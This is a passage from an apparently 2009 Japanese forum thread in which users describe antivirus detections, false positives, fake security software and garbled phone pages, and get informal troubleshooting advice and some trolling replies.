とりあえず安心しでもいいです
ただ検出されなかったのではなく、検出できなかった可能性もあるので絶対大丈夫とは思わないように。
4594572009/02/24(火) 18:23:11
どうもありがとうございます。
ということはウイルスやトロイの木馬等は、勝手に侵入してくることはあっても、
勝手にまた出て行ってしまう(消滅してしまう)ということはないわけですね。
アンチウイルスソフトを過信しないようにしながらも、これからもこまめにチェックするようにします。
460名無しさん@お腹いっぱい。2009/02/24(火) 22:01:42
初心者です。you tubeを開くと あやしい muhahaha!という画面が出てきて 画面が消えてしまいます。
どうしたらよいでしょうか?
461名無しさん@お腹いっぱい。2009/02/24(火) 22:26:32
【使用OS】 「XP home SP2」
【Microsoft Update(MU)の状態】 「自動更新設定」
【使用セキュリティソフトとバージョン】 「バスター2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「バスター2008」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有り」

【スキャンの結果何が検出されたか
検索時にポップアップが出て

スパイウェアの疑いが見つかりました
名前 C:\WINDOWS\SYSTEM32\ADVAPI32.DLL
危険度 高
実行した処理 隔離/隔離できません

とでて、ヘルプを参照しましたが、対処方法の表示がなく、検索も途中で
止まってしまっています。

お助けをお願いします・・
462 ◆N9P3SuvBPo sage2009/02/24(火) 22:55:04
>461
この"C:\WINDOWS\SYSTEM32\ADVAPI32.DLL"というファイルがスパイウェアの疑いがあると、出てるんですね。
virustotalで上記のファイルをスキャンしてください。
ttp://www.virustotal.com/jp/

さらに上記のファイルのプロパティを見て、作成日、会社名を教えてください。
463名無しさん@お腹いっぱい。2009/02/24(火) 23:09:09
>>462
>この"C:\WINDOWS\SYSTEM32\ADVAPI32.DLL"というファイルがスパイウェアの疑いがあると、出てるんですね。
virustotalで上記のファイルをスキャンしてください。
ttp://www.virustotal.com/jp/

virustotalというのは初めて使用しましたが、
一行下記行がありました。

アンチウイルス バージョン 更新日 結果
Sunbelt 3.2.1851.2 2009.02.12 Trojan.Win32.Patched.B (vf)

>さらに上記のファイルのプロパティを見て、作成日、会社名を教えてください。
作成日 2001/12/4
会社名 Microsoft Corporation
となっております。

よろしくお願いします・・
464 ◆N9P3SuvBPo sage2009/02/24(火) 23:26:14
>463
正規ファイル…か。
さてどうしたものやろ…とりあえず「リカバリをお奨めします」と言っておこうか。

その問題のファイルのサイズ(バイト数)を控えてください。
次に、問題のファイルの名前を変更してください。(ADVAPI32.DLL→ADVAPI32.BAKに)
暫く待てば、名前を変えたファイルの隣に「ADVAPI32.DLL」という名前のファイルが作成されると思います。
新たに作成された、ADVAPI32.DLLとADVAPI32.BAKのファイルサイズを教えてください。
465名無しさん@お腹いっぱい。2009/02/24(火) 23:35:26
>>464
新たに作成された、ADVAPI32.DLLとADVAPI32.BAKのファイルサイズを教えてください。

advapi.dll → 658KB
advapi.bak → 658KB
advapi.dllは変更前、後共に同じファイルサイズです。

何か対策があれば是非・・・m(_ _)m
4664652009/02/24(火) 23:38:53
「advapi」→「advapi32」
の間違いです。

すみません
467 ◆N9P3SuvBPo sage2009/02/24(火) 23:39:29
>465
658KBの横にある()の中の数値も一緒ですか?

あと、先ほどのvirustotalで問題のファイルをスキャンしてみましたか?
スキャンしたのなら、結果をURLを貼って教えてください。
468名無しさん@お腹いっぱい。sage2009/02/24(火) 23:40:15
>>465
トレンドマイクロに検体に出して調べてもらう
4696452009/02/24(火) 23:46:45
>>467
>658KBの横にある()の中の数値も一緒ですか?
はい。同じです→673,792byte

検索結果
ttp://www.virustotal.com/jp/analisis/0f2eee7109212a1f36a9e05c3b127c0d

重ねてよろしくお願いいたします
470 ◆N9P3SuvBPo sage2009/02/24(火) 23:51:30
>468
virustotalでスキャンすれば、アップロードされたファイルは各ベンダーに
送られるんじゃなかった?

>469
どうやら誤検出ですね…リカバリしなくても大丈夫です。
後はadvapi32.bakの方を削除しても構いません。(今削除できなくても再起動後に削除できるはずです)
advapi32.dllの方は削除しないように。
471名無しさん@お腹いっぱい。2009/02/25(水) 00:03:39
>>470

ありがとうございます。
そのようにしてみます。
m(_ _)m
472名無しさん@お腹いっぱい。sage2009/02/25(水) 00:09:36
>>470
VirusTotal に送られたファイルはアンチウイルスベンダが
持ち込んだ取得できないウイルスの一覧に該当するウイルスを
自動解析にかけ、マルウェアと認定された場合に製品に取り込まれる
このプロセスどおりなら false positive は放置の可能性がある。
ttp://www.virustotal.com/privacy.html
# Collection and use of submit samples and personal information の項

dll 一つだけで誤検出の可能性が高いならば、
正規ユーザなんだろうから、トレンドに調べもらうのが一番固い。
それまでは新たに生成された dll を使ってれば多少はリスクも減る。
473 ◆N9P3SuvBPo sage2009/02/25(水) 00:38:10
>472
てことは、各ベンダーに送られるんじゃなくて、各ベンダーのスキャンエンジンによって
アップロードされたファイルをスキャンしてるってこと?

誤検出で間違いありませんよ。
こちらもXPSP2のPCを持ってまして、
"C:\WINDOWS\SYSTEM32\ADVAPI32.DLL"のプロパティを調べてみたところ、
作成日は「2005年12月22日」と、>463と異なりましたが
会社名は「Microsoft Corporation」
ファイルサイズは658KB(673,792byte)でしたので。

XPSP3やVistaではどうか知りませんけど…。
474名無しさん@お腹いっぱい。sage2009/02/25(水) 01:19:23
>>473
あくまでも想像でしかないので、軽く聞き流してくれ。

AV担当者:「これらのウイルスのサンプルをくれ」
VT担当者:「へい、調べときやす」
             :
VT担当者:「マルウェアのサンプル一覧ができたのでお渡しします」
AV担当者:「ありがとさん」

ってな流れになっているように読めた。
475名無しさん@お腹いっぱい。sage2009/02/25(水) 15:06:25
質問です
クリーンインストールだけじゃなくハードディスクもグラフィックボードもマザーボードも
メモリーもプロセッサーもCDドライブも交換したのにxeroxというフォルダが消えません
どうすればいいのですか
476名無しさん@お腹いっぱい。2009/02/25(水) 16:22:45
質問です。マッキントッシュユーザーなのですが、
ウィルスに感染してしまったようで
フォルダやファイルやアプリケーションを開くたびに
音声がいちいち低い声で読み上げます。
何のウィルスか知っている方がいらしたら教えていただけないでしょうか。
よろしくお願いします。
477名無しさん@お腹いっぱい。2009/02/25(水) 16:24:40
質問です。マッキントッシュユーザーなのですが、
ウィルスに感染してしまったようで
フォルダやファイルやアプリケーションを開くたびに
音声がいちいち低い声で読み上げます。
何のウィルスか知っている方がいらしたら教えていただけないでしょうか。
よろしくお願いします。
478名無しさん@お腹いっぱい。sage2009/02/25(水) 17:28:36
おもしれぇウィルスじゃんw
479名無しさん@お腹いっぱい。sage2009/02/25(水) 18:09:25
質問いいですか。
peercastで何か視聴しようとすると、
カスペル先生が以下のダイアログを通知してきて通信遮断されるので視聴できないんです。
qvod.exeという中国産のプレーヤーらしいのですが、それ以上はぐぐってもほとんど情報がないので
どう対策したものかと困っています。情報あれば教えてほしいです。
http://up2.viploader.net/pic2/src/viploaderf150614.png
480名無しさん@お腹いっぱい。sage2009/02/25(水) 18:31:49
>>479
ttp://www.virustotal.com/jp/analisis/86c484d2c012207556a9b3f216ec5d76
遮断しといた方が良さそうだね。
481名無しさん@お腹いっぱい。sage2009/02/25(水) 18:43:06
>>480
おお、情報thxであります。
482名無しさん@お腹いっぱい。sage2009/02/25(水) 22:53:44
>>475
正常です。全く問題ないよ
483名無しさん@お腹いっぱい。sage2009/02/26(木) 00:06:24
>>475
xerox フォルダ でぐぐれ
484名無しさん@お腹いっぱい。2009/02/26(木) 09:16:29
あるサイトでHTML:Iframe-infというウィルスを踏んだのですがどう対処すればいいですか?
アンチウィルスソフトはavastを使っていて一応チェストに移動しました。
485名無しさん@お腹いっぱい。sage2009/02/27(金) 03:23:13
>>484
フリー使っていながら何故対処法聞くの?
インラインフレームなぞ脆弱性がなければry
486名無しさん@お腹いっぱい。sage2009/02/27(金) 13:25:52
>>484
W32/Virut.nにやられている可能性大
フルスキャンすべし
https://secure.nai.com/japan/security/virV.asp?v=W32/Virut.n
487名無しさん@お腹いっぱい。sage2009/02/28(土) 13:16:34
書き込めないって出たけどアクブロされてんのかな。
488名無しさん@お腹いっぱい。sage2009/02/28(土) 13:18:22
あ書けた。改行数かな。ちょっとお願いします。

「アプリケーションの変更と削除」から「Adobe Flash Player ActiveX」を選んで消そうとしたんですが
削除できずに無反応と思ったらイカのようなファイルが生成され
Au_exe ns643.tmpのようなプロセスが起動していました。
生成するフォルダやファイルで調べると
ttp://www.mcafee.com/japan/security/virG2008.asp?v=Generic%20PUP.x!1D0E5B2B
のような有害なプログラムの生成ファイルと似ていることがわかりましたが
FWで警告も出ないので特に外部と通信している様子もなく再起動したら問題なく消せました。

これが長時間起動していたOSの不調でうまくアンインストできなかっただけなのか
それとも本当に有害だったのかがわからないためどなたかわかる方おられないでしょうか。
Ad-awareやAvastなどで検索かけてみましたが特にひっかかりませんでした。
489名無しさん@お腹いっぱい。sage2009/02/28(土) 13:18:50
C:\Documents and Settings\ユーザ名\Local Settings\Temp\nss642.tmp
フォルダ
C:\Documents and Settings\ユーザ名\Local Settings\Temp\nss642.tmp\ns643.tmp
6144 byte
C:\Documents and Settings\ユーザ名\Local Settings\Temp\nss642.tmp\nsExec.dll
6144 byte
実行するたびに数値が増えていく。

C:\Documents and Settings\ユーザ名\Local Settings\Temp\~nsu.tmp\Au_.exe
説明:Adobe@ Flash@ Player ActiveX Installer
89,102 byte
実行するたびに Bu_.exe のように~nsu.tmp内のファイルが増えていく。

C:\WINNT\system32\Macromed\Flash\uninstall_activeX.exe
説明:Adobe@ Flash@ Player ActiveX Installer
89,102 byte
アンインストールプログラムのようだがこれが実行されると上のような不可解な挙動をする。
再起動した後に実行すると消えた。

【使用OS】 「Windows2k」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「Avast4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「した」
【スパイウェア対策ソフト】 「SpyBot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「した」
【ルータの有無】 「なし」
490名無しさん@お腹いっぱい。sage2009/02/28(土) 14:08:51
ウィルスソフトでお勧めってなんですか?
3台のpcに使いたいのでウィルスバスターを使ってるんですが
もっといいのありますか?
491名無しさん@お腹いっぱい。sage2009/02/28(土) 14:14:18
バスターが最底辺だと思います
492名無しさん@お腹いっぱい。age2009/03/01(日) 14:21:03
【使用OS】Windows XP
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】ウイルスセキュリティ0
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】最近
【スパイウェア対策ソフト】 同上?
【スパイウェア対策ソフトの更新は定期的に行なっているか】同上
【ルータの有無】あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
Windows Defenderにて検出されました。
カテゴリ:トロイの木馬
リソース:
process:
pid:1780

file:
C:\WINDOWS\system32\dsewtds0.dll


消去しても再起動すると再度検出されます。
セキュリティ0では未検出でした。
493名無しさん@お腹いっぱい。sage2009/03/01(日) 14:26:22
>>492
オートラン系のウイルスらしい。
USB記憶装置を全部取り外して、トレンドフレックスでスキャンしてみて。
494名無しさん@お腹いっぱい。2009/03/01(日) 14:31:09
>>493
ありがとうございます!
すぐに試してみます。
495名無しさん@お腹いっぱい。2009/03/01(日) 15:45:04
【使用OS】Vista HomePremium SP1
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】Symantec Norton Internet Security 2009 v16.1.0.33
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】最新
【スパイウェア対策ソフト】ノートンとspybot 
【スパイウェア対策ソフトの更新は定期的に行なっているか】最新
【ルータの有無】あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンの結果というか、昨日あたりから1分近い間隔で
「未使用ポート遮断機能が通信を遮断しました。インバウンドTCP接続」ってログが出るんですよね
これってノートンが過剰反応してるだけなんですかね?ちょっと気持ち悪くて
496名無しさん@お腹いっぱい。sage2009/03/01(日) 20:50:05
>>495
正確な事は分からんけど、ルーターが有ってインバウンドがあるということは、ルーターに穴が開いている可能性がある。
497名無しさん@お腹いっぱい。age2009/03/01(日) 21:06:32
【使用OS】 「WinXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスタ-2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「ウィルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なっている」
【ルータの有無】 「無し」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】

ウイルス名 "TROJ_Generic.DIS"
パス "F:\System Volume Information\_restore{CB2759E9-4605-4FE1-8447-29F266474282}\RP120\A0018563.exe"

ログを見たところ、一週間前から一日に8件ほど検出されています。パス名等は同じです。
Fドライブは倉庫用として使っています。
駆除できていないと考えて良いのでしょうか?
498名無しさん@お腹いっぱい。sage2009/03/01(日) 21:09:40
システムの復元領域だから、ウィルス対策ソフトでは駆除できないんじゃないの。
いったんシステムの復元を無効にすれば消えると思う。
499 ◆N9P3SuvBPo sage2009/03/01(日) 21:17:04
>497
問題なし
498の言う通りシステムの復元を無効→有効→再スキャン
検出されなくなればOK

この“System Volume Information”は対策ソフトですら手が出せない領域なので
アクセスが拒否されて駆除失敗するのは当然です。
それとできることならルーターも有ったほうがよいと思います。
500名無しさん@お腹いっぱい。sage2009/03/01(日) 21:24:09
>>498
>>499
ありがとうございます。
早速試して見ます。

ルータはISDNのため断念しています。
バスターのファイアーウォールのログが一日100件超えてます。
501名無しさん@お腹いっぱい。sage2009/03/01(日) 22:13:45
>>500
>ルータはISDNのため断念しています。
なんで?
502名無しさん@お腹いっぱい。sage2009/03/01(日) 22:17:16
>>501
今ISDN対応で出回ってるのは高い。

まぁオクとかで落とせばいいんだろうけど。

503名無しさん@お腹いっぱい。2009/03/02(月) 13:17:45
どこで聞いたら良いかわからなかったのですが、お願いします。
エロ動画サイトのサンプル動画ってダウンロードすると
電話帳データ抜き取られる事があると噂に聞いたんですが本当ですか?
マジレス願います。
504名無しさん@お腹いっぱい。2009/03/02(月) 15:25:15
ADSLモデム、ADSLルータのメモリに直接感染して悪さをする、通信を不安定にするような
ウイルスなどは存在しますか。

いつからか、インターネットに繋いだときのレスポンスが悪くなる現象が目立つようになり、
突如としてADSLルータにすら接続できなくなったりする現象に遭遇するようになりました。
モデムを再起動すると一時的に改善しますが、この現象が頻繁に起きるようになったのです。

そこでこれまで使っていたADSLルータを新しいADSLルータに交換したらこの現象はなくなりました。
ひょっとすると、これはルータのハードウェア的障害が原因ではなく、ウイルスが原因だったのでしょうか?
505名無しさん@お腹いっぱい。sage2009/03/02(月) 18:53:30
>>503
エロ動画とかエロいなお前
506名無しさん@お腹いっぱい。sage2009/03/02(月) 19:39:56
知恵をお貸しください。

友人のことなのですが、巡回したサイトに次々と誹謗中傷の書き込みがされるそうです。
中傷の内容は本人特定がギリギリできないレベルで、警察やプロバイダーに相談しても実害が出ていないと手が出せないと言われました。
そのためにPCをノートからデスクトップに代えたらしいのですが、それでも嫌がらせが続くようです。

・OSなどの使用環境は未確認
・ネットワークは有線接続
・ウィルス対策ソフトは導入(ソフト名は未確認)
・犯人の目星はついているが証拠がないため手が出せない

知っている情報は以上です。
おそらくウィルスで巡回サイトを特定されていると思い、リカバリを勧めたのですが他に良い自衛方法があれば教えて下さい。
507名無しさん@お腹いっぱい。sage2009/03/02(月) 20:08:53
>>506
>そのためにPCをノートからデスクトップに代えた
意味不明
508名無しさん@お腹いっぱい。sage2009/03/02(月) 20:14:33
>>507
釣りだから無視しろよ
509名無しさん@お腹いっぱい。2009/03/02(月) 20:40:21
頭の悪い奴がオウム返しのようにレス処理しているからこのスレには価値がない
誘導したらこいつらも付いてくるからそれも無理
とにかくググれ!
510名無しさん@お腹いっぱい。2009/03/02(月) 20:41:13
ごめん、スレ間違っちゃったよm(_ _)m
511506sage2009/03/02(月) 22:06:05
あはは、釣り認定されましたか^^;
じゃあ質問を変えます

他人のPCをリモートで監視するソフトってありますか?
512名無しさん@お腹いっぱい。sage2009/03/02(月) 22:11:11
ある
513名無しさん@お腹いっぱい。sage2009/03/03(火) 11:59:03
NOD使ってるんだけど、時々右下にIDとパスが違いますって出ます。
これはなんでしょうか
514名無しさん@お腹いっぱい。sage2009/03/03(火) 12:01:33
>>511
PCに詳しい人は、ルータやモデムの仕様を知っていて、リモートホスト判れば何でも出来るんだよ。
515名無しさん@お腹いっぱい。2009/03/04(水) 21:16:17
>>514
家のネット回線?は有線でPC同士で繋がっている状態なんだけど
この状態だと家族の中でもPCの画面覗くことってできます?
なんか親父が俺のPC覗いてるような気がしてならない(理由は色々とあるんだけども


というか話変わるんだけど
ウィルスバスター2009でほぼ毎日検索かけてるんですが
今PCに元々はいっていたノートンセキュリティーが検索をかけだして
まだ途中なんですが22個のクッキーと2個のウィルスが検出されています
でも今日ウィルスバスターで検索をかけていたのにこの数は多すぎだと思うのですが
これはウィルスバスターが検出できないようなものもノートンが検出したということでしょうか?
516名無しさん@お腹いっぱい。sage2009/03/04(水) 21:17:49
うん。
517名無しさん@お腹いっぱい。sage2009/03/04(水) 21:45:04
【使用OS】 「WinXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「なし」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「なし」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「してない」
【ルータの有無】 「有り」

便利ツールインスコしてたりしてて次回立ち上げるとマウスのポインタしか映らなかったり
映ってもしばらくするとブルスク
以前まで出来てたオンラインスキャンも文字なしのエラーが出て???状態なったからOSインスコ
そろそろウィルス対策ソフトいれようかなぁと思ってるけど、今回のはスペック不足?
こういうウィルスってあるんですかね
518名無しさん@お腹いっぱい。sage2009/03/04(水) 22:01:42
>>515
ウィルスバスターとノートン
2つのアンチウイルスソフトをインストールしてるのかい?
519名無しさん@お腹いっぱい。2009/03/04(水) 22:07:47
>>518
ウィルスバスター2009はソフト買ってきてインストールしたもので
ノートンはいつのまにかPCに入ってました
でもウィルス検出はするけど駆除まではやってないみたい?
520名無しさん@お腹いっぱい。sage2009/03/04(水) 23:05:24
>>519
どっちかアンインスコしたほうがいいぞ
521名無しさん@お腹いっぱい。2009/03/04(水) 23:23:54
ノートン消しますた^p^
522名無しさん@お腹いっぱい。sage2009/03/04(水) 23:24:42
むしろバスター消せよ
523名無しさん@お腹いっぱい。sage2009/03/04(水) 23:25:03
だなw
524名無しさん@お腹いっぱい。2009/03/05(木) 06:04:33
携帯にウィルスかハッカー入り込む事ってありますか?
525名無しさん@お腹いっぱい。2009/03/05(木) 06:12:28
携帯でネットしてたら変な漢字がズラリと並んだページが出てきた。上の方はまともな文字が並んでたが途中から変な漢字が並んで出てきた。これってウィルス?
526名無しさん@お腹いっぱい。sage2009/03/05(木) 09:49:21
先日、あるサイトを開いたら、凄い勢いで感染しただの、危険だの、といった英文が出てきました。
HIGH、LOW、などといったランク付けされた検出結果みたいな画面とともに、すぐに駆除しないと危険ですとコメントがでます。
OKすると、アンチウィルスPROの購入を勧める画面になって、それらの画面が消せません。
再起動すると、デスクトップ右下のタグの赤い盾みたいな?セキュリティー関連のやつ?が何だか主張していて、
それをクリックすると同じように前述したような画面が出てきます。
何かに感染しているとは思うのですが全くの初心者なので対処が分かりません。
OSはVISTAでセキュリティーソフトは入れていません。
パソコンを買った時に、初期設定してくれた店の人が、VISTAはセキュリティーソフトが内蔵されているので、そういったソフトは入れないで下さいと言われていたので。
長くなってしまいすいません。誰か助けて下さい。
527名無しさん@お腹いっぱい。sage2009/03/05(木) 10:05:34
流行の偽セキュリティソフトの類だな。
とりあえずリカバリ。
終わったら、近くの家電量販店で「ノートンインターネットセキュリティ」ってのを買ってこい。

>VISTAはセキュリティーソフトが内蔵されているので、そういったソフトは入れないで下さい
Vista付属のははっきり言ってお守りレベル。
コントロールパネルの方から無効にできるから、早々に別のセキュリティソフト導入を勧める。
528名無しさん@お腹いっぱい。sage2009/03/05(木) 10:06:04
祈りなさい。祈るのです!
529名無しさん@お腹いっぱい。sage2009/03/05(木) 10:08:40
店の人ひどいね
530名無しさん@お腹いっぱい。sage2009/03/05(木) 10:36:53
>>525
文字コードがおかしいとかじゃないの
531名無しさん@お腹いっぱい。sage2009/03/05(木) 12:55:15
>>515
つ別回線

それよりも>>515のPCはパスワードつけてないとか、PCつけっぱなしにして学校行くとかしてるんじゃないか?
532名無しさん@お腹いっぱい。sage2009/03/05(木) 13:06:34
>>526です。
職場の人に聞いたら、スパイボット?ってのが無料でダウンロード出来るから、
それで駆除してみて、それでもまだおかしいようだったら初期化した方がいいよと言われました。
どっちがいいですかね?
そのスパイボットっていうのを試してみる価値があるなら、まずは試してみようかなと思うのですが。
ほんとにパソコン音痴なもので、初期化するにもサービス業者に委託で頼まないと出来ないから、
出来たら初期化しない方向でいきたいんですけど…。
そのスパイボット使って自分で駆除するのが難しそうなら諦めて初期化します。
533名無しさん@お腹いっぱい。sage2009/03/05(木) 13:24:49
>>532
Spybotを使うこと自体は簡単ですよ。多分誰でも出来るかと。
というか・・・。こんなとこに書いてる暇があったら、
その前に、自分でやってみたらどうなんですかね?
534名無しさん@お腹いっぱい。sage2009/03/05(木) 13:39:44
>>532
Spybotだけではとうてい無理。正規のセキュリティソフト入れてないんだろ?
AntiVirusPro - 駆除方法
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2007-100119-4941-99&tabid=3

↓これだけやってもどうかという所だと思うよ。
http://pc11.2ch.net/test/read.cgi/sec/1231490187/146
535名無しさん@お腹いっぱい。sage2009/03/05(木) 15:39:41
>>533
>>534
すいません。全く未知の事なんで、ある程度情報収集してからじゃないと怖くないですか?
パソコンなんて安い物でもないですし…。下手な事はしない方がいいと思って色々聞いてしまいました。
spybotだけでは駄目そうなので、みなさんの言うように初期化しようかと思います。
ありがとうございました。
536名無しさん@お腹いっぱい。2009/03/05(木) 17:21:13
>>530 いえ違うと思う・・何故ならPCに以前入ったやつと同じだから。それもウィルス又はハッカーだったのでPC作動中に誤作動ばかり起こしてた。変な漢字といっても漢字辞典に載ってないような奇妙なやつなんだよね・・・
537名無しさん@お腹いっぱい。sage2009/03/06(金) 00:14:43
>>536
だから・・・普通の携帯電話は基本的に、Webページを見て感染するウイルスなんて無いよ。
エンコードとかの文字化けか、そうかバイナリファイルでも開いたんだと思うよ?
538名無しさん@お腹いっぱい。2009/03/06(金) 02:48:18
>>536です PC版のとあるHPを携帯から見ててそのHPにあるメアドに返信したのを機におかしくなったのでそのメアド(HP)がウィルスに感染しててこっちに感染したのでは・・と思っている。
539名無しさん@お腹いっぱい。2009/03/06(金) 03:15:33
>>536です。>>538の続き こういった経験ある人いませんか?少なくとも文字ばけ等では絶対ない。自分のPCに現れたのと同じものなので。例えば次の様な形で出てくる→「娜禽胤○タィ繼覩ァ○贓臧黐ラュ齲」
540名無しさん@お腹いっぱい。2009/03/06(金) 03:45:19
【使用OS】 「WindowsXP SP2」
【Microsoft Update(MU)の状態】 「SP3ではないが他のプログラムは更新済み」
【使用セキュリティソフトとバージョン】 「ESET Smart Security 定義ファイルバージョン3911 」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「SpyBot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「いいえ」
【ルータの有無】 「あり」

【スキャンの結果】 「検出されず」

spybotにて突然レジストリ変更の警告が出ました
「wextract_cleanup0」を変更するかどうかという警告で、調べてみるとウィルスの可能性があるようです
NOD32で検索かけても何も検出しません
ためしに他社のオンラインスキャンをかけてみたのですがそれでも検出なし(カスペOSは何故かDB更新で止まるので不可でした)
警告出現時に閲覧していたサイトは「ふたばちゃんねる」と「FF9攻略」の2つ
実行していたアプリケーションはSleipnirとギコナビのみです
全く身に覚えのない変更な上、怪しいアドレス等を踏んだ覚えもなく焦っています
これは誤検出なのでしょうか?

*ログ
現在のファイル名: rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\WINDOWS\TEMP\IXP000.TMP\"
データベースの状態: 典型的な該当は無し
値: wextract_cleanup0
ファイル名: advpack.dll, DelNodeRunDLL32 [path] [filename].TMP
記述
Wextract Cleanup0 is valid and legal software included or sold to help clean up temporary or cab files created by the installer software for a wide variety of software. It should disapear after a restart of the system. If not fix it
ソース: Paul Collins Startup list
____________________

*ログここまで
541名無しさん@お腹いっぱい。2009/03/06(金) 03:56:49
>>536(524、525)です。 >>525で説明してた変な漢字の事ですが調べ直したら漢字辞典に載ってるのもありました。ただ日常使わない難しい漢字が結構入っててカタカナが混じってたりしてどうしていいか分からない
542名無しさん@お腹いっぱい。sage2009/03/06(金) 04:24:19
>>541
閲覧していたページの文字コードが間違ってるだけじゃないの?
文字化けしたら変な漢字が出てくるのは当たり前だし、もしかしたら携帯には非対応のページかもよ。
何でもかんでもウイルスと騒ぐ前に文字化けは文字コードについてググれ。
543名無しさん@お腹いっぱい。2009/03/06(金) 07:02:38
>>542 ハイ、ハイ わかりましたよw
544名無しさん@お腹いっぱい。sage2009/03/06(金) 07:41:12
普通にPC専用サイトとかを携帯で開こうとしたらそうなるっつうの
いい加減うざい
545名無しさん@お腹いっぱい。2009/03/06(金) 08:40:56
プッww 釣れてやんの ガキ
546名無しさん@お腹いっぱい。sage2009/03/06(金) 10:34:18
頭悪いやつが沸いたようだな
ウィルスバスターの公式サイト携帯でみれば分かるぞ
547名無しさん@お腹いっぱい。2009/03/06(金) 10:36:40
悪い普通に見えたわ
548名無しさん@お腹いっぱい。2009/03/06(金) 21:06:59
【使用OS】 「Mac OS10.5」にWinXPが乗ってます
【Microsoft Update(MU)の状態】 「不明」
【使用セキュリティソフトとバージョン】 「Macはノートン winはマカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「不明」
【スパイウェア対策ソフト】 「多分上記のみ」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「不明」
【ルータの有無】 「あり」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「不明」

知り合いなのですが、Macの動作がおかしくなったとかで、HDDを物理フォーマットし
OSも入れ直したそうです。
おかしくなる頃に変なメールが来ていたそうですが、おかしくなったMacとは別のMacで
そのメールを開いて見たそうです。
物理フォーマットしOS入れたあともノートンが「ウイルスオフセットパス」を検出したとかで
そのファイルは除去したそうですが、その後ノートンが

インターネットへのFinderアクセスを遮断しました
アプリケーションの遮断 着信
/System/Library/CoreServices/Finder.app/Contets/MacOS/Finder
ユーザー 501 

と2回ずつ6分おきに外部着信、と言うそうです。
どうしたらいいかもう毎日トラブルの質問でこっちも参っています
Macなんて触ったこともありません。知り合いは長年Macを使っているくせに何もわかっていません

これはいったい何なのか、どうしたらよいのか、どなたかお助け願います。
549名無しさん@お腹いっぱい。2009/03/06(金) 23:59:01
>546             悪いだと?お前、それ誰にいってんの?あ〜ぁ、お前自身の事か。 納得
550名無しさん@お腹いっぱい。2009/03/07(土) 00:13:30
>546 悪いだと?お前、それ誰にいってんの?あ〜ぁお前自身の事か。 納得
551名無しさん@お腹いっぱい。sage2009/03/07(土) 02:47:46
IEが自動で大量に開いて特定のサイトにアクセスしようとする
その後、エラーの警告文でこう表示される
「不明なソフトウェア例外(0xe0bd7363)がアプリケーション0x7e812a5b」

素人なりにIEごと消そうと、ゴミ箱⇒ディスククリーンしたけどまだ治まらない
知恵を貸してください

OSはXP、ウィルス対策に入れてるノートンでは感知されませんでした
552名無しさん@お腹いっぱい。sage2009/03/07(土) 08:38:53

  / ̄ ̄ ̄ /  /''7 ./''7        / ̄/  /''7
 ./ ./ ̄/ /  /__/ / /  ____    ̄  / /
 'ー' _/ /   ___ノ /  /____/   ___ノ /
   /___ノ   /____,./         /____,./

   _ノ ̄/ / ̄/  /''7 / ̄ ̄ ̄/   / ̄/             /'''7'''7
/ ̄  /    ̄  / /    ̄ フ ./   /  ゙ー-;   ____   / / /._
 ̄/ /     ___ノ /   __/  (___  /  /ー--'゙ /____/ _ノ /i  i/ ./
 /__/   /____,./   /___,.ノゝ_/ /_/           /__,/ ゝ、__/
553名無しさん@お腹いっぱい。sage2009/03/07(土) 11:04:19
>>549
お断りします
  お断りします
   ハハ ハハ
   (゚ω゚)゚ω゚)
  /  \  \
((⊂ )  ノ\つノ\つ)
   (_⌒ヽ ⌒ヽ
   丶 ヘ | ヘ |
εニ三 ノノ Jノ J
554名無しさん@お腹いっぱい。2009/03/07(土) 17:08:11
とりあえずセキュリティセンターを、無効にしてみたら???
555名無しさん@お腹いっぱい。2009/03/08(日) 03:08:35
>>536です。
>>542 言われた通りググって色々調べた結果、問題解決しそうです。有難うございました。それから543と545は私ではありません。念の為に(^_^;)
556名無しさん@お腹いっぱい。sage2009/03/08(日) 15:26:16
ビヘイビアブロッキングとか挙動を監視する技術あるけど、それがあれば重要な
ファイルとか削除する前に警告がでるの?
ウィルスそれをかいくぐってできることって何があるの?
557556sage2009/03/08(日) 15:45:07
ごめん、解決した
558名無しさん@お腹いっぱい。sage2009/03/14(土) 11:47:30
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
【使用OS】      『XP sp3』
【使用ブラウザ】  『IE7』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】     『Norton Internet Security』
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】  『ケーブルでモデムのみ使用』

NORTONでシステムの完全スキャンをしたところ、「Backdoor.Trojanをウイルススキャナが検出しました」
とでました。
で、
状態:削除しました
推奨する処理:解決しました-処理なし

となっています。
これはもう問題は完全に解決したと考えてよいのでしょうか?
クリーンインストールなどは不要でしょうか。

ちなみに
